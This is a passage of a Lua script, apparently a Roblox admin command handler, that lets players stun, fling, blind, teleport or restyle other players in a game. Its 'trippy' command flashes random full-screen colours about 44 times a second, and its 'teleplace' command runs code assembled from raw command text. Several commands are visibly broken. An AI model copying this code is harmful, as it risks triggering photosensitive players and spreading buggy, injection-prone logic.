  1257. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1258. for i, v in pairs(plrz) do
  1259. coroutine.resume(coroutine.create(function()
  1260. if v and v.Character and v.Character:findFirstChild("Torso") then
  1261. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  1262. end
  1263. end))
  1264. end
  1265. end
  1266.  
  1267. if Cmd.Text:lower():sub(1,5) == "stun " then
  1268. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1269. for i, v in pairs(plrz) do
  1270. coroutine.resume(coroutine.create(function()
  1271. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1272. v.Character.Humanoid.PlatformStand = true
  1273. end
  1274. end))
  1275. end
  1276. end
  1277.  
  1278. if Cmd.Text:lower():sub(1,7) == "unstun " then
  1279. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1280. for i, v in pairs(plrz) do
  1281. coroutine.resume(coroutine.create(function()
  1282. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1283. v.Character.Humanoid.PlatformStand = false
  1284. end
  1285. end))
  1286. end
  1287. end
  1288.  
  1289. if Cmd.Text:lower():sub(1,5) == "jump " then
  1290. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1291. for i, v in pairs(plrz) do
  1292. coroutine.resume(coroutine.create(function()
  1293. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1294. v.Character.Humanoid.Jump = true
  1295. end
  1296. end))
  1297. end
  1298. end
  1299.  
  1300. if Cmd.Text:lower():sub(1,4) == "sit " then
  1301. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1302. for i, v in pairs(plrz) do
  1303. coroutine.resume(coroutine.create(function()
  1304. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1305. v.Character.Humanoid.Sit = true
  1306. end
  1307. end))
  1308. end
  1309. end
  1310.  
  1311. if Cmd.Text:lower():sub(1,10) == "invisible " then
  1312. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1313. for i, v in pairs(plrz) do
  1314. coroutine.resume(coroutine.create(function()
  1315. if v and v.Character then
  1316. for a, obj in pairs(v.Character:children()) do
  1317. if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  1318. end
  1319. end
  1320. end))
  1321. end
  1322. end
  1323.  
  1324. if Cmd.Text:lower():sub(1,8) == "visible " then
  1325. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1326. for i, v in pairs(plrz) do
  1327. coroutine.resume(coroutine.create(function()
  1328. if v and v.Character then
  1329. for a, obj in pairs(v.Character:children()) do
  1330. if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  1331. end
  1332. end
  1333. end))
  1334. end
  1335. end
  1336.  
  1337.  
  1338.  
  1339. if Cmd.Text:lower():sub(1,5) == "fire " then
  1340. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1341. for i, v in pairs(plrz) do
  1342. coroutine.resume(coroutine.create(function()
  1343. if v and v.Character and v.Character:findFirstChild("Torso") then
  1344. local cl = Instance.new("Fire", v.Character.Torso)
  1345. end
  1346. end))
  1347. end
  1348. end
  1349.  
  1350. if Cmd.Text:lower():sub(1,7) == "unfire " then
  1351. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1352. for i, v in pairs(plrz) do
  1353. coroutine.resume(coroutine.create(function()
  1354. if v and v.Character and v.Character:findFirstChild("Torso") then
  1355. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  1356. end
  1357. end))
  1358. end
  1359. end
  1360.  
  1361. if Cmd.Text:lower():sub(1,6) == "smoke " then
  1362. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1363. for i, v in pairs(plrz) do
  1364. coroutine.resume(coroutine.create(function()
  1365. if v and v.Character and v.Character:findFirstChild("Torso") then
  1366. local cl = Instance.new("Smoke", v.Character.Torso)
  1367. end
  1368. end))
  1369. end
  1370. end
  1371.  
  1372. if Cmd.Text:lower():sub(1,8) == "unsmoke " then
  1373. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1374. for i, v in pairs(plrz) do
  1375. coroutine.resume(coroutine.create(function()
  1376. if v and v.Character and v.Character:findFirstChild("Torso") then
  1377. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  1378. end
  1379. end))
  1380. end
  1381. end
  1382.  
  1383. if Cmd.Text:lower():sub(1,9) == "sparkles " then
  1384. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1385. for i, v in pairs(plrz) do
  1386. coroutine.resume(coroutine.create(function()
  1387. if v and v.Character and v.Character:findFirstChild("Torso") then
  1388. local cl = Instance.new("Sparkles", v.Character.Torso)
  1389. end
  1390. end))
  1391. end
  1392. end
  1393.  
  1394. if Cmd.Text:lower():sub(1,11) == "unsparkles " then
  1395. local plrz = GetPlr(plr, Cmd.Text:lower():sub(12))
  1396. for i, v in pairs(plrz) do
  1397. coroutine.resume(coroutine.create(function()
  1398. if v and v.Character and v.Character:findFirstChild("Torso") then
  1399. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  1400. end
  1401. end))
  1402. end
  1403. end
  1404.  
  1405. if Cmd.Text:lower():sub(1,3) == "ff " then
  1406. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4))
  1407. for i, v in pairs(plrz) do
  1408. coroutine.resume(coroutine.create(function()
  1409. if v and v.Character then Instance.new("ForceField", v.Character) end
  1410. end))
  1411. end
  1412. end
  1413.  
  1414. if Cmd.Text:lower():sub(1,5) == "unff " then
  1415. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1416. for i, v in pairs(plrz) do
  1417. coroutine.resume(coroutine.create(function()
  1418. if v and v.Character then
  1419. for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  1420. end
  1421. end))
  1422. end
  1423. end
  1424.  
  1425. if Cmd.Text:lower():sub(1,7) == "freeze " then
  1426. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1427. for i, v in pairs(plrz) do
  1428. coroutine.resume(coroutine.create(function()
  1429. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1430. for a, obj in pairs(v.Character:children()) do
  1431. if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  1432. end
  1433. end
  1434. end))
  1435. end
  1436. end
  1437.  
  1438. if Cmd.Text:lower():sub(1,5) == "thaw " then
  1439. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1440. for i, v in pairs(plrz) do
  1441. coroutine.resume(coroutine.create(function()
  1442. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1443. for a, obj in pairs(v.Character:children()) do
  1444. if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  1445. end
  1446. end
  1447. end))
  1448. end
  1449. end
  1450.  
  1451.  
  1452.  
  1453. if Cmd.Text:lower():sub(1,4) == "god " then
  1454. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1455. for i, v in pairs(plrz) do
  1456. coroutine.resume(coroutine.create(function()
  1457. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1458. v.Character.Humanoid.MaxHealth = math.huge
  1459. v.Character.Humanoid.Health = 9e9
  1460. end
  1461. end))
  1462. end
  1463. end
  1464.  
  1465. if Cmd.Text:lower():sub(1,6) == "ungod " then
  1466. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1467. for i, v in pairs(plrz) do
  1468. coroutine.resume(coroutine.create(function()
  1469. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1470. v.Character.Humanoid.MaxHealth = 100
  1471. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1472. end
  1473. end))
  1474. end
  1475. end
  1476.  
  1477. if Cmd.Text:lower():sub(1,8) == "ambient " then
  1478. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1479. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1480. game.Lighting.Ambient = Color3.new(Cmd.Text:sub(9,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1481. end
  1482.  
  1483. if Cmd.Text:lower():sub(1,11) == "brightness " then
  1484. game.Lighting.Brightness = Cmd.Text:sub(12)
  1485. end
  1486.  
  1487. if Cmd.Text:lower():sub(1,5) == "time " then
  1488. game.Lighting.TimeOfDay = Cmd.Text:sub(6)
  1489. end
  1490.  
  1491. if Cmd.Text:lower():sub(1,9) == "fogcolor " then
  1492. local chk1 = Cmd.Text:lower():sub(10):find(" ") + 9
  1493. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1494. game.Lighting.FogColor = Color3.new(Cmd.Text:sub(10,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1495. end
  1496.  
  1497. if Cmd.Text:lower():sub(1,7) == "fogend " then
  1498. game.Lighting.FogEnd = Cmd.Text:sub(8)
  1499. end
  1500.  
  1501. if Cmd.Text:lower():sub(1,9) == "fogstart " then
  1502. game.Lighting.FogStart = Cmd.Text:sub(10)
  1503. end
  1504.  
  1505.  
  1506.  
  1507. if Cmd.Text:lower():sub(1,12) == "rtools " then
  1508. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1509. for i, v in pairs(plrz) do
  1510. coroutine.resume(coroutine.create(function()
  1511. if v and v.Character and v:findFirstChild("Backpack") then
  1512. for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1513. for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1514. end
  1515. end))
  1516. end
  1517. end
  1518.  
  1519.  
  1520.  
  1521.  
  1522.  
  1523.  
  1524.  
  1525. if Cmd.Text:lower():sub(1,8) == "shealth " then
  1526. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1527. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9,chk1-1))
  1528. for i, v in pairs(plrz) do
  1529. coroutine.resume(coroutine.create(function()
  1530. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1531. v.Character.Humanoid.MaxHealth = Cmd.Text:sub(chk1+1)
  1532. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1533. end
  1534. end))
  1535. end
  1536. end
  1537.  
  1538. if Cmd.Text:lower():sub(1,6) == "speed " then
  1539. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1540. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1541. for i, v in pairs(plrz) do
  1542. coroutine.resume(coroutine.create(function()
  1543. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1544. v.Character.Humanoid.WalkSpeed = Cmd.Text:sub(chk1+1)
  1545. end
  1546. end))
  1547. end
  1548. end
  1549.  
  1550.  
  1551. if Cmd.Text:lower():sub(1,10) == "teleplace " then
  1552. local chk1 = Cmd.Text:lower():sub(11):find(" ") + 10
  1553. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11,chk1-1))
  1554. for i, v in pairs(plrz) do
  1555. coroutine.resume(coroutine.create(function()
  1556. if v and v:findFirstChild("PlayerGui") then
  1557. local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] .. Cmd.Text:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  1558. end
  1559. end))
  1560. end
  1561. end
  1562.  
  1563. if Cmd.Text:lower():sub(1,3) == "tp " then
  1564. local chk1 = Cmd.Text:lower():sub(4):find(" ") + 3
  1565. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4,chk1-1))
  1566. local plrz2 = GetPlr(plr, Cmd.Text:lower():sub(chk1+1))
  1567. for i, v in pairs(plrz) do
  1568. coroutine.resume(coroutine.create(function()
  1569. for i2, v2 in pairs(plrz2) do
  1570. if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") and v2.Character:findFirstChild("Torso") then
  1571. v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  1572. end
  1573. end
  1574. end))
  1575. end
  1576. end
  1577.  
  1578. if Cmd.Text:lower():sub(1,7) == "statchange " then
  1579. local chk1 = Cmd.Text:lower():sub(8):find(" ") + 7
  1580. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1581. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8,chk1-1))
  1582. for i, v in pairs(plrz) do
  1583. coroutine.resume(coroutine.create(function()
  1584. if v and v:findFirstChild("leaderstats") then
  1585. for a, st in pairs(v.leaderstats:children()) do
  1586. if st.Name:lower():find(Cmd.Text:sub(chk1+1,chk2-1)) == 1 then st.Value = Cmd.Text:sub(chk2+1) end
  1587. end
  1588. end
  1589. end))
  1590. end
  1591. end
  1592.  
  1593. if Cmd.Text:lower():sub(1,6) == "shirt " then
  1594. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1595. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1596. for i, v in pairs(plrz) do
  1597. coroutine.resume(coroutine.create(function()
  1598. if v and v.Character then
  1599. for i,v in pairs(v.Character:children()) do
  1600. if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1601. end
  1602. end
  1603. end))
  1604. end
  1605. end
  1606.  
  1607. if Cmd.Text:lower():sub(1,6) == "pants " then
  1608. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1609. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1610. for i, v in pairs(plrz) do
  1611. coroutine.resume(coroutine.create(function()
  1612. if v and v.Character then
  1613. for i,v in pairs(v.Character:children()) do
  1614. if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1615. end
  1616. end
  1617. end))
  1618. end
  1619. end
  1620.  
  1621. if Cmd.Text:lower():sub(1,5) == "gear " then
  1622. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1623. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6, chk1-1))
  1624. for i, v in pairs(plrz) do
  1625. if Cmd.Text:lower():sub(6) == "all" then return end
  1626. if Cmd.Text:lower():sub(6) == "others"then return end
  1627. if Cmd.Text:lower():sub(6) == "nonadmins" then return end
  1628. coroutine.resume(coroutine.create(function()
  1629. if v and v:findFirstChild("Backpack") then
  1630. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1631. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Backpack end end
  1632. obj:Destroy()
  1633. end
  1634. end))
  1635. end
  1636. end
  1637.  
  1638. if Cmd.Text:lower():sub(1,5) == "face " then
  1639. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1640. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1641. for i, v in pairs(plrz) do
  1642. coroutine.resume(coroutine.create(function()
  1643. if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  1644. v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  1645. end
  1646. end))
  1647. end
  1648. end
  1649.  
  1650.  
  1651.  
  1652.  
  1653.  
  1654.  
  1655. if Cmd.Text:lower():sub(1,6) == "music " then
  1656. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1657. local id = Cmd.Text:sub(7)
  1658. local pitch = 1
  1659. if tostring(id):lower():find("caramell") then id = 2303479 end
  1660. if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  1661. if tostring(id):find("rick") then id = 2027611 end
  1662. if tostring(id):find("halo") then id = 1034065 end
  1663. if tostring(id):find("pokemon") then id = 1372261 end
  1664. if tostring(id):find("cursed") then id = 1372257 end
  1665. if tostring(id):find("extreme") then id = 11420933 end
  1666. if tostring(id):find("awaken") then id = 27697277 end
  1667. if tostring(id):find("alone") then id = 27697392 end
  1668. if tostring(id):find("mario") then id = 1280470 end
  1669. if tostring(id):find("choir") then id = 1372258 end
  1670. if tostring(id):find("chrono") then id = 1280463 end
  1671. if tostring(id):find("dotr") then id = 11420922 end
  1672. if tostring(id):find("entertain") then id = 27697267 end
  1673. if tostring(id):find("fantasy") then id = 1280473 end
  1674. if tostring(id):find("final") then id = 1280414 end
  1675. if tostring(id):find("emblem") then id = 1372259 end
  1676. if tostring(id):find("flight") then id = 27697719 end
  1677. if tostring(id):find("banjo") then id = 27697298 end
  1678. if tostring(id):find("gothic") then id = 27697743 end
  1679. if tostring(id):find("hiphop") then id = 27697735 end
  1680. if tostring(id):find("intro") then id = 27697707 end
  1681. if tostring(id):find("mule") then id = 1077604 end
  1682. if tostring(id):find("film") then id = 27697713 end
  1683. if tostring(id):find("nezz") then id = 8610025 end
  1684. if tostring(id):find("angel") then id = 1372260 end
  1685. if tostring(id):find("resist") then id = 27697234 end
  1686. if tostring(id):find("schala") then id = 5985787 end
  1687. if tostring(id):find("organ") then id = 11231513 end
  1688. if tostring(id):find("tunnel") then id = 9650822 end
  1689. if tostring(id):find("spanish") then id = 5982975 end
  1690. if tostring(id):find("venom") then id = 1372262 end
  1691. if tostring(id):find("wind") then id = 1015394 end
  1692. if tostring(id):find("guitar") then id = 5986151 end
  1693. if tostring(id):find("fox") then id = 130797915 end
  1694. if tostring(id):find("gangnam") then id = 130844430 end
  1695. if tostring(id):find("nyan") then id = 130786686 end
  1696. if tostring(id):find("harlem") then id = 131154740 end
  1697. local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1 s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() until s.IsPlaying
  1698. end
  1699.  
  1700. if Cmd.Text:lower() == "stopmusic" then
  1701. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1702. end
  1703.  
  1704. if Cmd.Text:lower() == "musiclist" then
  1705. if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  1706. local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  1707. local list = {"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","Harlem","Nyan","Fox","Gangnam","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  1708. for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1709. end
  1710.  
  1711.  
  1712. if Cmd.Text:lower():sub(1,5) == "spin " then
  1713. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1714. for i, v in pairs(plrz) do
  1715. coroutine.resume(coroutine.create(function()
  1716. if v and v.Character and v.Character:findFirstChild("Torso") then
  1717. for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  1718. local torso = v.Character:findFirstChild("Torso")
  1719. local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P = 11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  1720. repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  1721. until not bg or bg.Parent ~= torso
  1722. end
  1723. end))
  1724. end
  1725. end
  1726.  
  1727. if Cmd.Text:lower():sub(1,7) == "unspin " then
  1728. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1729. for i, v in pairs(plrz) do
  1730. coroutine.resume(coroutine.create(function()
  1731. if v and v.Character and v.Character:findFirstChild("Torso") then
  1732. for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  1733. end
  1734. end))
  1735. end
  1736. end
  1737.  
  1738.  
  1739.  
  1740. if Cmd.Text:lower():sub(1,8) == "bighead " then
  1741. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1742. for i, v in pairs(plrz) do
  1743. coroutine.resume(coroutine.create(function()
  1744. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 = CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1745. end))
  1746. end
  1747. end
  1748.  
  1749. if Cmd.Text:lower():sub(1,9) == "minihead " then
  1750. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1751. for i, v in pairs(plrz) do
  1752. coroutine.resume(coroutine.create(function()
  1753. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 = CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1754. end))
  1755. end
  1756. end
  1757.  
  1758. if Cmd.Text:lower():sub(1,6) == "fling " then
  1759. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1760. for i, v in pairs(plrz) do
  1761. coroutine.resume(coroutine.create(function()
  1762. if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  1763. local xran local zran
  1764. repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  1765. repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  1766. v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  1767. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  1768. end
  1769. end))
  1770. end
  1771. end
  1772.  
  1773. if Cmd.Text:lower():sub(1,8) == "seizure " then
  1774. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1775. for i, v in pairs(plrz) do
  1776. coroutine.resume(coroutine.create(function()
  1777. if v and v.Character then
  1778. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  1779. end
  1780. end))
  1781. end
  1782. end
  1783.  
  1784. if Cmd.Text:lower():sub(1,10) == "unseizure " then
  1785. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1786. for i, v in pairs(plrz) do
  1787. coroutine.resume(coroutine.create(function()
  1788. if v and v.Character then
  1789. for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  1790. wait(.1) v.Character.Humanoid.PlatformStand = false
  1791. end
  1792. end))
  1793. end
  1794. end
  1795.  
  1796. if Cmd.Text:lower():sub(1,12) == "rlimbs " then
  1797. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1798. for i, v in pairs(plrz) do
  1799. coroutine.resume(coroutine.create(function()
  1800. if v and v.Character then
  1801. for a, obj in pairs(v.Character:children()) do
  1802. if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  1803. end
  1804. end
  1805. end))
  1806. end
  1807. end
  1808.  
  1809.  
  1810. if Cmd.Text:lower():sub(1,5) == "char " then
  1811. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1812. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1813. for i, v in pairs(plrz) do
  1814. coroutine.resume(coroutine.create(function()
  1815. if v and v.Character then
  1816. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. Cmd.Text:sub(chk1+1)
  1817. v:LoadCharacter()
  1818. end
  1819. end))
  1820. end
  1821. end
  1822.  
  1823. if Cmd.Text:lower():sub(1,7) == "unchar " then
  1824. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1825. for i, v in pairs(plrz) do
  1826. coroutine.resume(coroutine.create(function()
  1827. if v and v.Character then
  1828. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  1829. v:LoadCharacter()
  1830. end
  1831. end))
  1832. end
  1833. end
  1834.  
  1835.  
  1836.  
  1837. if Cmd.Text:lower():sub(1,7) == "normal " then
  1838. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1839. for i, v in pairs(plrz) do
  1840. coroutine.resume(coroutine.create(function()
  1841. if v and v.Character and v.Character:findFirstChild("Torso") then
  1842. if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  1843. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1844. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1845. v.Character.Torso.Transparency = 0
  1846. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1847. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1848. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  1849. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1850. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1851. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1852. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  1853. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  1854. if prt.Name == "FAKETORSO" then prt:Destroy() end
  1855. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("White")
  1856. end end
  1857. end
  1858. end))
  1859. end
  1860. end
  1861.  
  1862. if Cmd.Text:lower():sub(1,7) == "trippy " then
  1863. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1864. for i, v in pairs(plrz) do
  1865. coroutine.resume(coroutine.create(function()
  1866. if v and v:findFirstChild("PlayerGui")then
  1867. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1868. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  1869. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1870. local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled = false
  1871. end
  1872. end))
  1873. end
  1874. end
  1875.  
  1876. if Cmd.Text:lower():sub(1,9) == "untrippy " then
  1877. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1878. for i, v in pairs(plrz) do
  1879. coroutine.resume(coroutine.create(function()
  1880. if v and v:findFirstChild("PlayerGui") then
  1881. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  1882. end
  1883. end))
  1884. end
  1885. end
  1886.  
  1887.  
  1888. if Cmd.Text:lower():sub(1,6) == "blind " then
  1889. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1890. for i, v in pairs(plrz) do
  1891. coroutine.resume(coroutine.create(function()
  1892. if v and v:findFirstChild("PlayerGui") then
  1893. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1894. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  1895. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1896. end
  1897. end))
  1898. end
  1899. end
  1900.  
  1901. if Cmd.Text:lower():sub(1,8) == "unblind " then
  1902. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1903. for i, v in pairs(plrz) do
  1904. coroutine.resume(coroutine.create(function()
  1905. if v and v:findFirstChild("PlayerGui") then
  1906. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  1907. end
  1908. end))
  1909. end
  1910. end
  1911.  
  1912. if Cmd.Text:lower():sub(1,7) == "guifix " then
  1913. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1914. for i, v in pairs(plrz) do
  1915. coroutine.resume(coroutine.create(function()
  1916. if v and v:findFirstChild("PlayerGui") then
  1917. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1918. end
  1919. end))
  1920. end
  1921. end
  1922.  
  1923. if Cmd.Text:lower():sub(1,9) == "loopheal " then
